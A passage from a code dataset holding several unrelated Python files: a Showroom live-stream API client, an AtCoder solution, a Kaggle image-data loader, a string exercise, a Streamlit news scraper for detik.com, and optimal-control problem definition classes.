None\n try:\n resp = self._query_next_live(room_id)\n if resp is not None:\n result = resp.json().get('epoch')\n\n if result is not None:\n result = datetime.datetime.fromtimestamp(result)\n except Exception as err:\n log_error(err)\n\n return result\n\n def throw_free_gift(self, live, gift_id, num):\n \"\"\"\n Throw free gift to given live.\n :param live: Live where to throw the gift.\n :type live: Live\n :param gift_id: Gift id to throw.\n :type gift_id: int\n :param num: Amount of items to throw.\n :type num: int\n \"\"\"\n result = None\n try:\n resp = self._query_gifting_free(live, gift_id, num)\n if resp is not None:\n respjson = resp.json()\n if respjson.get('ok'):\n text = {\n 'ok': respjson['ok'],\n 'level': respjson['fan_level']['fan_level'],\n 'point': respjson['fan_level']['contribution_point'],\n 'levelup': respjson['notify_level_up'],\n 'gift_id': respjson['gift_id'],\n 'remaining': respjson['remaining_num']\n }\n\n result = json.loads(json.dumps(text))\n elif respjson.get('errors'):\n result = respjson\n log_error('Errors (%s)' % respjson.get('errors'))\n elif respjson.get('error'):\n result = respjson\n log_error('Error (%s)' % respjson.get('error'))\n\n except Exception as err:\n log_error(err)\n\n return result\n\n def throw_paid_gift(self, live, gift_id, num):\n \"\"\"\n Throw paid gift to given live.\n :param live: Live where to throw the gift.\n :type live: Live\n :param gift_id: Gift id to throw.\n :type gift_id: int\n :param num: Amount of items to throw.\n :type num: int\n \"\"\"\n result = None\n try:\n resp = self._query_gifting_point_use(live, gift_id, num)\n if resp is not None:\n result = resp.json()\n except Exception as err:\n log_error(err)\n\n return result\n\n def execute_lottery(self, lottery):\n \"\"\"\n Execute requested 
lottery.\n :param lottery: The lottery to play.\n :type lottery: string\n :returns: The JSON with the reply.\n :rtype: string\n \"\"\"\n result = None\n try:\n resp = self._query_lottery(lottery)\n if resp is not None:\n result = resp.json()\n if result.get('error') == 1:\n result = None\n except Exception as err:\n log_error(err)\n\n return result\n\n def update_user_avatar(self, avatar_id):\n \"\"\"\n Updates the user avatar.\n :param avatar_id: The id of the avatar to use.\n :type avatar_id: string\n :returns: The JSON with the reply.\n :rtype: string\n \"\"\"\n result = None\n try:\n resp = self._query_update_user_avatar(avatar_id)\n if resp is not None:\n result = resp.json()\n if result.get('error') == 1:\n result = None\n except Exception as err:\n log_error(err)\n\n return result\n\n def get_room_profile(self, room):\n result = None\n try:\n resp = self._query_room_profile(room)\n if resp is not None:\n result = resp.json()\n except Exception as err:\n log_error(err)\n\n return result\n","repo_name":"rpgrca/srtools","sub_path":"srtools/manager/api/showroomapi.py","file_name":"showroomapi.py","file_ext":"py","file_size_in_byte":23071,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"38446777027","text":"N = int(input())\n\nchild = [[] for _ in range(N)]\nfor i in range(N - 1):\n par = int(input()) - 1\n child[par].append(i + 1)\n\n\n# return i's salary\ndef dfs(i):\n my_child = child[i]\n if len(my_child) == 0:\n return 1\n else:\n max_s = -1\n min_s = float('inf')\n\n for ch in my_child:\n s = dfs(ch)\n if s > max_s:\n max_s = s\n if s < min_s:\n min_s = s\n\n return max_s + min_s + 1\n\n\nprint(dfs(0))\n","repo_name":"ET0024/AtCoder","sub_path":"ABC001~100/ABC026/C-4.py","file_name":"C-4.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7301182217","text":"# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport random\r\nimport bson # conda install -c anaconda pymongo\r\nfrom skimage.data import imread\r\nimport scipy.misc as misc\r\nimport io\r\nimport os\r\nimport shutil\r\nimport time\r\nimport config\r\nimport helper\r\n\r\n\r\nclass Data():\r\n def __init__(self, logger):\r\n self.logger = logger\r\n \r\n self.train_data = []\r\n self.train_label = []\r\n\r\n self.eval_data = []\r\n self.eval_label = []\r\n\r\n self.test_data = []\r\n self.test_label = []\r\n\r\n def extract_train_data(self):\r\n helper.log(self.logger, '[data] Extracting and save train data into images ...')\r\n \r\n # Delete the current images \r\n if os.path.exists(config.processed_train_dir):\r\n shutil.rmtree(config.processed_train_dir)\r\n os.makedirs(config.processed_train_dir)\r\n time.sleep(1)\r\n \r\n # load and save new train images\r\n train_bson = bson.decode_file_iter(open(config.train_path, 'rb')) \r\n for c, d in enumerate(train_bson):\r\n product_id = d[config.key_product_id]\r\n category_id = d[config.key_category_id]\r\n helper.log(self.logger,' Product, Category: {0}, {1}'.format(product_id, category_id))\r\n \r\n for e, pic in enumerate(d[config.key_imgs]):\r\n picture = imread(io.BytesIO(pic[config.key_picture]))\r\n picture_path = config.processed_train_dir + \\\r\n str(product_id) + '_' + \\\r\n str(category_id) + '_' + \\\r\n str(e) +'.png'\r\n misc.imsave(picture_path, picture)\r\n\r\n def extract_test_data(self):\r\n helper.log(self.logger, '[data] Extracting and save test data into images ...')\r\n \r\n # Delete 
the current images \r\n if os.path.exists(config.processed_test_dir):\r\n shutil.rmtree(config.processed_test_dir)\r\n os.makedirs(config.processed_test_dir)\r\n time.sleep(1)\r\n \r\n # load and save new train images\r\n test_bson = bson.decode_file_iter(open(config.test_path, 'rb')) \r\n for c, d in enumerate(test_bson):\r\n product_id = d[config.key_product_id]\r\n helper.log(self.logger, ' Product: {0}'.format(product_id))\r\n \r\n for e, pic in enumerate(d[config.key_imgs]):\r\n picture = imread(io.BytesIO(pic[config.key_picture]))\r\n picture_path = config.processed_test_dir + \\\r\n str(product_id) + '_' + \\\r\n str(e) +'.png'\r\n misc.imsave(picture_path, picture)\r\n \r\n def read_train_data(self):\r\n helper.log(self.logger, '[data] Reading train data into arrays ...')\r\n \r\n del self.train_data[:]\r\n del self.train_label[:]\r\n \r\n del self.eval_data[:]\r\n del self.eval_label[:]\r\n \r\n # Load data into arrays\r\n train_bson = bson.decode_file_iter(open(config.train_example_path, 'rb'))\r\n for c, d in enumerate(train_bson):\r\n product_id = d[config.key_product_id]\r\n category_id = d[config.key_category_id]\r\n helper.log(self.logger, ' Product: {0}'.format(product_id))\r\n \r\n for e, pic in enumerate(d[config.key_imgs]):\r\n picture = imread(io.BytesIO(pic[config.key_picture]))\r\n self.train_data.append(picture)\r\n self.train_label.append(category_id)\r\n \r\n # Divide data into train and eval data\r\n num_data = len(self.train_data)\r\n num_train = np.int(num_data * config.train_ratio)\r\n #num_eval = num_data - num_train\r\n \r\n train_indices = random.sample(range(num_data), num_train)\r\n eval_indices = [i for i in range(num_data) if i not in train_indices] \r\n\r\n self.eval_data = [self.train_data[i] for i in eval_indices]\r\n self.eval_label = [self.train_label[i] for i in eval_indices]\r\n \r\n self.train_data = [self.train_data[i] for i in train_indices]\r\n self.train_label = [self.train_label[i] for i in train_indices]\r\n\r\n self.train_data = np.asarray(self.train_data)\r\n self.train_label = np.asarray(self.train_label)\r\n self.eval_data = np.asarray(self.eval_data)\r\n self.eval_label = np.asarray(self.eval_label)\r\n \r\n helper.log(self.logger, '[data] Train data shape: {0}'.format(self.train_data.shape))\r\n helper.log(self.logger, '[data] Train label shape: {0}'.format(self.train_label.shape)) \r\n helper.log(self.logger, '[data] Eval data shape: {0}'.format(self.eval_data.shape))\r\n helper.log(self.logger, '[data] Eval label shape: {0}'.format(self.eval_label.shape))\r\n \r\n def read_test_data(self, data_path):\r\n #TBD\r\n pass\r\n\r\n def get_train_data(self):\r\n return self.train_data\r\n \r\n def get_train_label(self):\r\n return self.train_label\r\n \r\n def get_eval_data(self):\r\n return self.eval_data\r\n \r\n def get_eval_label(self):\r\n return self.eval_label\r\n \r\n def get_test_data(self):\r\n return self.test_data\r\n \r\n def get_test_label(self):\r\n return self.test_label\r\n","repo_name":"Cuongvn08/kaggle_cdiscount_image_classify","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30358476960","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jan 30 18:50:33 2021\r\n\r\n@author: 91994\r\n\"\"\"\r\ndef remove(string, n):\r\n first = string [ : n ]\r\n last = string [ n+1 : ]\r\n return first + last\r\nstring = input (\" Enter the string : \")\r\nn=int(input(\" Enter the 
index of the character to remove : \"))\r\nprint(\"string :\", string)\r\nprint(\"Modified string:\")\r\nprint(remove(string, n)) \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Elizabethelu/python-lab","sub_path":"remove n^th index.py","file_name":"remove n^th index.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15186532639","text":"import httpx\nimport asyncio\nimport datetime\nimport pandas as pd\nimport streamlit as st\nfrom selectolax.parser import HTMLParser\n\nasync def parse_item(result):\n    # Extract the title and URL of each search result item\n    title = result.css_first('h2').text()\n    url = result.css_first('a').attrs['href']\n    category = result.css_first('span.category').text()\n    date = result.css_first('span.date').text().lstrip(category)\n    desc = result.css_first('span.box_text > p').text()\n    content = await parse_content(url)\n    return {\n        'title': title,\n        'url': url,\n        'category': category,\n        'date': date,\n        'desc': desc,\n        'content': content\n    }\n\nasync def parse_content(url):\n    async with httpx.AsyncClient() as client:\n        try:\n            response = await client.get(url, timeout=10.0)\n        except httpx.TimeoutException:\n            return {\"error\": f\"Sorry, unable to connect to {url}. \\nPlease try again.\"}\n\n    parser = HTMLParser(response.text)\n    contents = parser.css('div.detail__body-text > p')\n    contents = [content.text() for content in contents]\n    return \"\\n\".join(contents)\n\nasync def parse(url, params, headers):\n    async with httpx.AsyncClient() as client:\n        try:\n            response = await client.get(url, params=params, headers=headers, timeout=10.0)\n        except httpx.TimeoutException:\n            st.error(f\"Sorry, unable to connect to {url}. \\nPlease try again.\")\n            return\n\n    parser = HTMLParser(response.text)\n\n    # Extract the search result items from the HTML\n    search_results = parser.css('article')\n\n    # Extract the items in parallel using map and asyncio.gather\n    items = await asyncio.gather(*[parse_item(result) for result in search_results])\n    return items\n\n\nasync def main():\n    url = \"https://www.detik.com/search/searchall?\"\n\n    st.title(\"DETIKScraper\")\n\n    keyword = st.text_input(\"Search keyword\")\n    pages = int(st.text_input(\"Total Pages\", value=\"1\"))\n    options = st.selectbox(\"Export to\", [\"CSV\", \"XLSX\", \"JSON\"])\n\n    if st.button(\"Scrape\"):\n        # Get the current date and time\n        now = datetime.datetime.now()\n        # Format the current date and time as a string\n        formatted_date_time = now.strftime(\"%Y%m%d_%H%M%S\")\n\n        params = {\n            \"query\": keyword,\n            \"page\": pages,\n        }\n\n        headers = {\n            \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/244.178.44.111 Safari/537.36\",\n        }\n\n        # Scrape the first `pages` pages of search results asynchronously using map and asyncio.gather\n        items = await asyncio.gather(*[parse(url, {**params, 'page': page}, headers) for page in range(1, pages + 1)])\n\n        # Flatten the nested list of items, skipping pages that failed and returned None\n        items = [item for page_items in items if page_items for item in page_items]\n\n        data = pd.DataFrame(items)\n        data.index += 1\n\n        st.dataframe(data)\n\n        mime_types = {\n            \"csv\": \"text/csv\",\n            \"xlsx\": \"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\",\n            \"json\": \"application/json\",\n        }\n        mime_type = mime_types.get(options.lower())\n        file_name = f\"{formatted_date_time}_{keyword}_{pages}.{options.lower()}\"\n        st.download_button(\"Download Result\", data=data.to_csv(index=False), 
file_name=file_name, mime=mime_type)\n\n\n\nif __name__ == '__main__':\n    asyncio.run(main())\n","repo_name":"karvanpy/DETIKNewsScraper","sub_path":"DETIKScraper.py","file_name":"DETIKScraper.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"23423535820","text":"import numpy as np\nimport json\nimport os\nimport sys\n\nclass ocp_nlp_dims:\n    \"\"\"\n    class containing the dimensions of the optimal control problem\n    \"\"\"\n    def __init__(self):\n        self.__nx = None #: :math:`n_x` - number of states \n        self.__nz = 0 #: :math:`n_z` - number of algebraic variables \n        self.__nu = None #: :math:`n_u` - number of inputs \n        self.__np = 0 #: :math:`n_p` - number of parameters \n        self.__ny = None #: :math:`n_y` - number of residuals in Lagrange term \n        self.__ny_e = None #: :math:`n_{y}^e` - number of residuals in Mayer term \n        self.__npd = 0 #: :math:`n_{\pi}` - dimension of the image of the inner nonlinear function in positive definite constraints \n        self.__npd_e = 0 #: :math:`n_{\pi}^e` - dimension of the image of the inner nonlinear function in positive definite constraints\n        self.__nh = 0 #: :math:`n_h` - number of nonlinear constraints \n        self.__nh_e = 0 #: :math:`n_{h}^e` - number of nonlinear constraints at t=T \n        self.__nbx = 0 #: :math:`n_{b_x}` - number of state bounds \n        self.__nbx_e = 0 #: :math:`n_{b_x}` - number of state bounds at t=T \n        self.__nbu = 0 #: :math:`n_{b_u}` - number of input bounds \n        self.__nsbx = 0 #: :math:`n_{{sb}_x}` - number of soft state bounds \n        self.__nsbx_e = 0 #: :math:`n_{{sb}^e_{x}}` - number of soft state bounds at t=T \n        self.__nsbu = 0 #: :math:`n_{{sb}_u}` - number of soft input bounds \n        self.__nsh = 0 #: :math:`n_{{sb}_u}` - number of soft nonlinear constraints \n        self.__nsh_e = 0 #: :math:`n_{{sb}_u}` - number of soft nonlinear constraints \n        self.__ns = 0 #: :math:`n_{s}` - total number of slacks \n        self.__ns_e = 0 #: :math:`n_{s}^e` - total number of slacks at t=T \n        self.__ng = 0 #: :math:`n_{g}` - number of general polytopic constraints \n        self.__ng_e = 0 #: :math:`n_{g}^e` - number of general polytopic constraints at t=T \n        self.__N = None #: :math:`N` - prediction horizon \n\n    @property\n    def nx(self):\n        return self.__nx\n\n    @property\n    def nz(self):\n        return self.__nz\n\n    @property\n    def nu(self):\n        return self.__nu\n\n    @property\n    def np(self):\n        return self.__np\n\n    @property\n    def ny(self):\n        return self.__ny\n\n    @property\n    def ny_e(self):\n        return self.__ny_e\n\n    @property\n    def npd(self):\n        return self.__npd\n\n    @property\n    def npd_e(self):\n        return self.__npd_e\n\n    @property\n    def nh(self):\n        return self.__nh\n\n    @property\n    def nh_e(self):\n        return self.__nh_e\n\n    @property\n    def nbx(self):\n        return self.__nbx\n\n    @property\n    def nbx_e(self):\n        return self.__nbx_e\n\n    @property\n    def nbu(self):\n        return self.__nbu\n\n    @property\n    def nsbx(self):\n        return self.__nsbx\n\n    @property\n    def nsbx_e(self):\n        return self.__nsbx_e\n\n    @property\n    def nsbu(self):\n        return self.__nsbu\n\n    @property\n    def nsh(self):\n        return self.__nsh\n\n    @property\n    def nsh_e(self):\n        return self.__nsh_e\n\n    @property\n    def ns(self):\n        return self.__ns\n\n    @property\n    def ns_e(self):\n        return self.__ns_e\n\n    @property\n    def ng(self):\n        return self.__ng\n\n    @property\n    def ng_e(self):\n        return self.__ng_e\n\n    @property\n    def N(self):\n        return self.__N\n\n    @nx.setter\n    def nx(self, nx):\n        if type(nx) == int and nx > 0:\n            self.__nx = nx\n        else:\n            raise 
Exception('Invalid nx value. Exiting.')\n\n    @nz.setter\n    def nz(self, nz):\n        if type(nz) == int and nz > -1:\n            self.__nz = nz\n        else:\n            raise Exception('Invalid nz value. Exiting.')\n\n    @nu.setter\n    def nu(self, nu):\n        if type(nu) == int and nu > 0:\n            self.__nu = nu\n        else:\n            raise Exception('Invalid nu value. Exiting.')\n\n    @np.setter\n    def np(self, np):\n        if type(np) == int and np > -1:\n            self.__np = np\n        else:\n            raise Exception('Invalid np value. Exiting.')\n\n    @ny.setter\n    def ny(self, ny):\n        if type(ny) == int and ny > -1:\n            self.__ny = ny\n        else:\n            raise Exception('Invalid ny value. Exiting.')\n\n    @ny_e.setter\n    def ny_e(self, ny_e):\n        if type(ny_e) == int and ny_e > -1:\n            self.__ny_e = ny_e\n        else:\n            raise Exception('Invalid ny_e value. Exiting.')\n\n    @npd.setter\n    def npd(self, npd):\n        if type(npd) == int and npd > -1:\n            self.__npd = npd\n        else:\n            raise Exception('Invalid npd value. Exiting.')\n\n    @npd_e.setter\n    def npd_e(self, npd_e):\n        if type(npd_e) == int and npd_e > -1:\n            self.__npd_e = npd_e\n        else:\n            raise Exception('Invalid npd_e value. Exiting.')\n\n    @nh.setter\n    def nh(self, nh):\n        if type(nh) == int and nh > -1:\n            self.__nh = nh\n        else:\n            raise Exception('Invalid nh value. Exiting.')\n\n    @nh_e.setter\n    def nh_e(self, nh_e):\n        if type(nh_e) == int and nh_e > -1:\n            self.__nh_e = nh_e\n        else:\n            raise Exception('Invalid nh_e value. Exiting.')\n\n    @nbx.setter\n    def nbx(self, nbx):\n        if type(nbx) == int and nbx > -1:\n            self.__nbx = nbx\n        else:\n            raise Exception('Invalid nbx value. Exiting.')\n\n    @nbx_e.setter\n    def nbx_e(self, nbx_e):\n        if type(nbx_e) == int and nbx_e > -1:\n            self.__nbx_e = nbx_e\n        else:\n            raise Exception('Invalid nbx_e value. Exiting.')\n\n    @nbu.setter\n    def nbu(self, nbu):\n        if type(nbu) == int and nbu > -1:\n            self.__nbu = nbu\n        else:\n            raise Exception('Invalid nbu value. Exiting.')\n\n    @nsbx.setter\n    def nsbx(self, nsbx):\n        if type(nsbx) == int and nsbx > -1:\n            self.__nsbx = nsbx\n        else:\n            raise Exception('Invalid nsbx value. Exiting.')\n\n    @nsbx_e.setter\n    def nsbx_e(self, nsbx_e):\n        if type(nsbx_e) == int and nsbx_e > -1:\n            self.__nsbx_e = nsbx_e\n        else:\n            raise Exception('Invalid nsbx_e value. Exiting.')\n\n    @nsbu.setter\n    def nsbu(self, nsbu):\n        if type(nsbu) == int and nsbu > -1:\n            self.__nsbu = nsbu\n        else:\n            raise Exception('Invalid nsbu value. Exiting.')\n\n    @nsh.setter\n    def nsh(self, nsh):\n        if type(nsh) == int and nsh > -1:\n            self.__nsh = nsh\n        else:\n            raise Exception('Invalid nsh value. Exiting.')\n\n    @nsh_e.setter\n    def nsh_e(self, nsh_e):\n        if type(nsh_e) == int and nsh_e > -1:\n            self.__nsh_e = nsh_e\n        else:\n            raise Exception('Invalid nsh_e value. Exiting.')\n\n    @ns.setter\n    def ns(self, ns):\n        if type(ns) == int and ns > -1:\n            self.__ns = ns\n        else:\n            raise Exception('Invalid ns value. Exiting.')\n\n    @ns_e.setter\n    def ns_e(self, ns_e):\n        if type(ns_e) == int and ns_e > -1:\n            self.__ns_e = ns_e\n        else:\n            raise Exception('Invalid ns_e value. Exiting.')\n\n    @ng.setter\n    def ng(self, ng):\n        if type(ng) == int and ng > -1:\n            self.__ng = ng\n        else:\n            raise Exception('Invalid ng value. Exiting.')\n\n    @ng_e.setter\n    def ng_e(self, ng_e):\n        if type(ng_e) == int and ng_e > -1:\n            self.__ng_e = ng_e\n        else:\n            raise Exception('Invalid ng_e value. Exiting.')\n\n    @N.setter\n    def N(self, N):\n        if type(N) == int and N > 0:\n            self.__N = N\n        else:\n            raise Exception('Invalid N value. 
Exiting.')\n\n def set(self, attr, value):\n setattr(self, attr, value)\n\nclass ocp_nlp_cost:\n \"\"\"\n class containing the description of the cost\n (linear least-squares cost for the time being) \n :math:`l(x,u,z) = || V_x x + V_u u + V_z z - y_{\\\\text{ref}}||^2_W`, \n :math:`m(x) = || V^e_x x - y_{\\\\text{ref}^e}||^2_{W^e}`\n \"\"\"\n def __init__(self):\n # Lagrange term\n self.__W = [] #: :math:`W` - weight matrix\n self.__Vx = [] #: :math:`V_x` - x matrix coefficient\n self.__Vu = [] #: :math:`V_u` - u matrix coefficient\n self.__Vz = [] #: :math:`V_z` - z matrix coefficient\n self.__yref = [] #: :math:`y_{\\text{ref}}` - reference\n self.__Zl = [] #: :math:`Z_l` - Hessian wrt lower slack \n self.__Zu = [] #: :math:`Z_u` - Hessian wrt upper slack \n self.__zl = [] #: :math:`z_l` - gradient wrt lower slack \n self.__zu = [] #: :math:`z_u` - gradient wrt upper slack \n # Mayer term\n self.__W_e = [] #: :math:`W^e` - weight matrix for Mayer term\n self.__Vx_e = [] #: :math:`V_x^e` - x matrix coefficient for Mayer term\n self.__yref_e = [] #: :math:`y_{\\text{ref}}^e` - reference for Mayer term\n self.__Zl_e = [] #: :math:`Z_l^e` - Hessian wrt lower slack for Mayer term\n self.__Zu_e = [] #: :math:`Z_u^e` - Hessian wrt upper slack for Mayer term\n self.__zl_e = [] #: :math:`z_l^e` - gradient wrt lower slack for Mayer term\n self.__zu_e = [] #: :math:`z_u^e` - gradient wrt upper slack for Mayer term\n\n # Lagrange term\n @property\n def W(self):\n return self.__W\n\n @property\n def Vx(self):\n return self.__Vx\n\n @property\n def Vu(self):\n return self.__Vu\n\n @property\n def Vz(self):\n return self.__Vz\n\n @property\n def yref(self):\n return self.__yref\n\n @property\n def Zl(self):\n return self.__Zl\n\n @property\n def Zu(self):\n return self.__Zu\n\n @property\n def zl(self):\n return self.__zl\n\n @property\n def zu(self):\n return self.__zu\n\n @W.setter\n def W(self, W):\n if type(W) == np.ndarray:\n self.__W = W\n else:\n raise Exception('Invalid W value. Exiting.')\n \n @Vx.setter\n def Vx(self, Vx):\n if type(Vx) == np.ndarray:\n self.__Vx = Vx\n else:\n raise Exception('Invalid Vx value. Exiting.')\n \n @Vu.setter\n def Vu(self, Vu):\n if type(Vu) == np.ndarray:\n self.__Vu = Vu\n else:\n raise Exception('Invalid Vu value. Exiting.')\n\n @Vz.setter\n def Vz(self, Vz):\n if type(Vz) == np.ndarray:\n self.__Vz = Vz\n else:\n raise Exception('Invalid Vz value. Exiting.')\n\n @yref.setter\n def yref(self, yref):\n if type(yref) == np.ndarray:\n self.__yref = yref\n else:\n raise Exception('Invalid yref value. Exiting.')\n\n @Zl.setter\n def Zl(self, Zl):\n if type(Zl) == np.ndarray:\n self.__Zl = Zl\n else:\n raise Exception('Invalid Zl value. Exiting.')\n\n @Zu.setter\n def Zu(self, Zu):\n if type(Zu) == np.ndarray:\n self.__Zu = Zu\n else:\n raise Exception('Invalid Zu value. Exiting.')\n\n @zl.setter\n def zl(self, zl):\n if type(zl) == np.ndarray:\n self.__zl = zl\n else:\n raise Exception('Invalid zl value. Exiting.')\n\n @zu.setter\n def zu(self, zu):\n if type(zu) == np.ndarray:\n self.__zu = zu\n else:\n raise Exception('Invalid zu value. 
Exiting.')\n\n # Mayer term\n @property\n def W_e(self):\n return self.__W_e\n\n @property\n def Vx_e(self):\n return self.__Vx_e\n\n @property\n def yref_e(self):\n return self.__yref_e\n\n @property\n def Zl_e(self):\n return self.__Zl_e\n\n @property\n def Zu_e(self):\n return self.__Zu_e\n\n @property\n def zl_e(self):\n return self.__zl_e\n\n @property\n def zu_e(self):\n return self.__zu_e\n\n @W_e.setter\n def W_e(self, W_e):\n if type(W_e) == np.ndarray:\n self.__W_e = W_e\n else:\n raise Exception('Invalid W_e value. Exiting.')\n \n @Vx_e.setter\n def Vx_e(self, Vx_e):\n if type(Vx_e) == np.ndarray:\n self.__Vx_e = Vx_e\n else:\n raise Exception('Invalid Vx_e value. Exiting.')\n\n @yref_e.setter\n def yref_e(self, yref_e):\n if type(yref_e) == np.ndarray:\n self.__yref_e = yref_e\n else:\n raise Exception('Invalid yref_e value. Exiting.')\n\n @Zl_e.setter\n def Zl_e(self, Zl_e):\n if type(Zl_e) == np.ndarray:\n self.__Zl_e = Zl_e\n else:\n raise Exception('Invalid Zl_e value. Exiting.')\n\n @Zu_e.setter\n def Zu_e(self, Zu_e):\n if type(Zu_e) == np.ndarray:\n self.__Zu_e = Zu_e\n else:\n raise Exception('Invalid Zu_e value. Exiting.')\n\n @zl_e.setter\n def zl_e(self, zl_e):\n if type(zl_e) == np.ndarray:\n self.__zl_e = zl_e\n else:\n raise Exception('Invalid zl_e value. Exiting.')\n\n @zu_e.setter\n def zu_e(self, zu_e):\n if type(zu_e) == np.ndarray:\n self.__zu_e = zu_e\n else:\n raise Exception('Invalid zu_e value. Exiting.')\n\n def set(self, attr, value):\n setattr(self, attr, value)\n\nclass ocp_nlp_constraints:\n \"\"\"\n class containing the description of the constraints\n \"\"\"\n def __init__(self):\n # bounds on x and u\n self.__lbx = [] #: :math:`\\underline{x}` - lower bounds on x\n self.__lbu = [] #: :math:`\\underline{u}` - lower bounds on u\n self.__ubx = [] #: :math:`\\bar{x}` - upper bounds on x \n self.__ubu = [] #: :math:`\\bar{u}` - upper bounds on u \n self.__idxbx = [] #: indexes of bounds on x (defines :math:`\\Pi_x`) \n self.__idxbu = [] #: indexes of bounds on u (defines :math:`\\Pi_u`)\n # bounds on x at t=T\n self.__lbx_e = [] #: :math:`\\underline{x}^e` - lower bounds on x at t=T \n self.__ubx_e = [] #: :math:`\\bar{x}^e` - upper bounds on x at t=T \n self.__idxbx_e = [] #: indexes for bounds on x at t=T (defines :math:`\\Pi_x^e`) \n # soft bounds on x and u\n self.__lsbx = [] #: soft lower bounds on x\n self.__lsbu = [] #: soft lower bounds on u\n self.__usbx = [] #: soft upper bounds on x \n self.__usbu = [] #: soft upper bounds on u \n self.__idxsbx = [] #: indexes of soft bounds on x \n self.__idxsbu = [] #: indexes of soft bounds on u\n # soft bounds on nonlinear constraints\n self.__lsh = [] #: soft lower bounds for nonlinear constraints \n self.__ush = [] #: soft upper bounds for nonlinear constraints \n self.__idxsh = [] #: indexes of soft nonlinear constraints \n # soft bounds on x and u at t=T\n self.__lsbx_e = [] #: soft lower bounds on x at t=T\n self.__usbx_e = [] #: soft upper bounds on x at t=T\n self.__idxsbx_e= [] #: indexes of soft bounds on x at t=T \n # soft bounds on nonlinear constraints\n self.__lsh_e = [] #: soft lower bounds for nonlinear constraints \n self.__ush_e = [] #: soft upper bounds for nonlinear constraints \n self.__idxsh_e = [] #: indexes of soft nonlinear constraints at t=T \n # polytopic constraints \n self.__lg = [] #: :math:`\\underline{c}` - lower bound for general polytopic inequalities \n self.__ug = [] #: :math:`\\bar{c}` - upper bound for general polytopic inequalities \n self.__D = [] #: :math:`D` - D 
matrix in lg <= D * u + C * x <= ug\n        self.__C = [] #: :math:`C` - C matrix in lg <= D * u + C * x <= ug\n        # polytopic constraints at t=T \n        self.__C_e = [] #: :math:`C^e` - C matrix at t=T \n        self.__lg_e = [] #: :math:`\underline{c}^e` - lower bound on general polytopic inequalities at t=T \n        self.__ug_e = [] #: :math:`\bar{c}^e` - upper bound on general polytopic inequalities at t=T \n        # nonlinear constraints\n        self.__lh = [] #: :math:`\underline{h}` - lower bound for nonlinear inequalities \n        self.__uh = [] #: :math:`\bar{h}` - upper bound for nonlinear inequalities \n        # nonlinear constraints at t=T\n        self.__uh_e = [] #: :math:`\bar{h}^e` - upper bound on nonlinear inequalities at t=T \n        self.__lh_e = [] #: :math:`\underline{h}^e` - lower bound on nonlinear inequalities at t=T \n        self.__x0 = [] #: :math:`\bar{x}_0` - initial state \n        self.__p = [] #: :math:`p` - parameters \n\n    @property\n    def lbx(self):\n        return self.__lbx\n\n    @property\n    def lbu(self):\n        return self.__lbu\n    \n    @property\n    def ubx(self):\n        return self.__ubx\n\n    @property\n    def ubu(self):\n        return self.__ubu\n\n    @property\n    def idxbx(self):\n        return self.__idxbx\n\n    @property\n    def idxbu(self):\n        return self.__idxbu\n\n    @property\n    def lsbx(self):\n        return self.__lsbx\n\n    @property\n    def lsbu(self):\n        return self.__lsbu\n    \n    @property\n    def usbx(self):\n        return self.__usbx\n\n    @property\n    def usbu(self):\n        return self.__usbu\n\n    @property\n    def idxsbx(self):\n        return self.__idxsbx\n\n    @property\n    def idxsbu(self):\n        return self.__idxsbu\n\n    @property\n    def lsh(self):\n        return self.__lsh\n\n    @property\n    def ush(self):\n        return self.__ush\n\n    @property\n    def idxsh(self):\n        return self.__idxsh\n\n\n    @property\n    def lsbx_e(self):\n        return self.__lsbx_e\n\n    @property\n    def usbx_e(self):\n        return self.__usbx_e\n\n    @property\n    def idxsbx_e(self):\n        return self.__idxsbx_e\n\n    @property\n    def lsh_e(self):\n        return self.__lsh_e\n\n    @property\n    def ush_e(self):\n        return self.__ush_e\n\n    @property\n    def idxsh_e(self):\n        return self.__idxsh_e\n\n    @property\n    def lg(self):\n        return self.__lg\n\n    @property\n    def ug(self):\n        return self.__ug\n\n    @property\n    def lh(self):\n        return self.__lh\n\n    @property\n    def uh(self):\n        return self.__uh\n\n    @property\n    def D(self):\n        return self.__D\n\n    @property\n    def C(self):\n        return self.__C\n\n    @property\n    def lbx_e(self):\n        return self.__lbx_e\n\n    @property\n    def ubx_e(self):\n        return self.__ubx_e\n\n    @property\n    def idxbx_e(self):\n        return self.__idxbx_e\n\n    @property\n    def C_e(self):\n        return self.__C_e\n\n    @property\n    def lg_e(self):\n        return self.__lg_e\n\n    @property\n    def ug_e(self):\n        return self.__ug_e\n\n    @property\n    def x0(self):\n        return self.__x0\n\n    @property\n    def p(self):\n        return self.__p\n\n    @lbx.setter\n    def lbx(self, lbx):\n        if type(lbx) == np.ndarray:\n            self.__lbx = lbx\n        else:\n            raise Exception('Invalid lbx value. Exiting.')\n\n    @ubx.setter\n    def ubx(self, ubx):\n        if type(ubx) == np.ndarray:\n            self.__ubx = ubx\n        else:\n            raise Exception('Invalid ubx value. Exiting.')\n\n    @idxbx.setter\n    def idxbx(self, idxbx):\n        if type(idxbx) == np.ndarray:\n            self.__idxbx = idxbx\n        else:\n            raise Exception('Invalid idxbx value. Exiting.')\n\n    @lbu.setter\n    def lbu(self, lbu):\n        if type(lbu) == np.ndarray:\n            self.__lbu = lbu\n        else:\n            raise Exception('Invalid lbu value. 
